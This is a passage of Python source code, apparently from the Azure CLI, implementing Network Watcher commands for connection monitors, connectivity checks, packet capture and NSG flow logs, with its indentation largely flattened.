test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
        raise CLIError('usage error: either the V1 parameters (source/destination resource, port, address) '
                       'or the V2 parameters (endpoint, test configuration, output) must be provided.')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
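# Note on create_nw_connection_monitor: supplying any of the V1 parameters (source/destination
# resource, port, address) selects the legacy creation path, which also swaps in a client pinned
# to the ad-hoc connection-monitor API version; supplying any of the V2 parameters (endpoints,
# test configurations, outputs) selects the V2 path instead.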
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
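# Note on _create_nw_connection_monitor_v2: a V2 monitor is assembled from one source endpoint,
# one destination endpoint, one test configuration and one test group; auto_start and the
# monitoring interval are deliberately left unset here.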
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
        raise CLIError('usage error: '
                       '--filter-type and --filter-item for an endpoint filter must be provided together.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
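    """Build a ConnectionMonitorTestGroup that references test configurations and endpoints by name."""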
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
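    """Build a ConnectionMonitorOutput; only the Log Analytics workspace output type is supported."""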
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
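    """Append a new endpoint (with optional scope and filter) to an existing connection monitor
    and register it in the requested source/destination test groups.
    """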
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
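    """Remove an endpoint and drop references to it from the selected test groups
    (or from all test groups when none are specified).
    """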
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
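    """Append a new test configuration to an existing connection monitor and reference it
    from the given test groups.
    """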
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
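    """Remove a test configuration and drop its references from the selected test groups
    (or from all test groups when none are specified).
    """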
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
    # refresh test groups, skipping groups that do not reference this configuration
    for test_group in temp_test_groups:
        if name in test_group.test_configurations:
            test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
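    """Add a test group to an existing connection monitor, creating endpoints and a test
    configuration on demand when their parameters are supplied.
    """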
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
        # pass the protocol-specific options by keyword: the helper's signature also takes
        # tcp_port_behavior (not exposed by this command), so positional passing would misbind them
        test_config = _create_nw_connection_monitor_v2_test_configuration(
            cmd,
            test_config_name,
            test_config_frequency,
            test_config_protocol,
            test_config_threshold_failed_percent,
            test_config_threshold_round_trip_time,
            test_config_preferred_ip_version,
            tcp_port=test_config_tcp_port,
            tcp_disable_trace_route=test_config_tcp_disable_trace_route,
            icmp_disable_trace_route=test_config_icmp_disable_trace_route,
            http_port=test_config_http_port,
            http_method=test_config_http_method,
            http_path=test_config_http_path,
            http_valid_status_codes=test_config_http_valid_status_codes,
            http_prefer_https=test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
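    """Remove a test group and prune any endpoints or test configurations referenced only by that group."""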
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
        raise CLIError('test group: "{}" does not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
    # deal with test configurations which are only referenced by this removed test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
    except ValueError:
        raise CLIError("usage error: '--local' and '--remote' must be in the format x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
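    """Fetch the NSG's current flow log configuration and patch storage, retention, format
    and traffic analytics settings before re-applying it.
    """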
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# resource_group_name + nsg identify the legacy NSG-scoped flow log status output;
# location + flow_log_name identify the newer flow log resource output
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
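    """Create a flow log resource, optionally configuring retention, log format and traffic analytics."""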
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None, # dummy parameter to let it appear in command
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
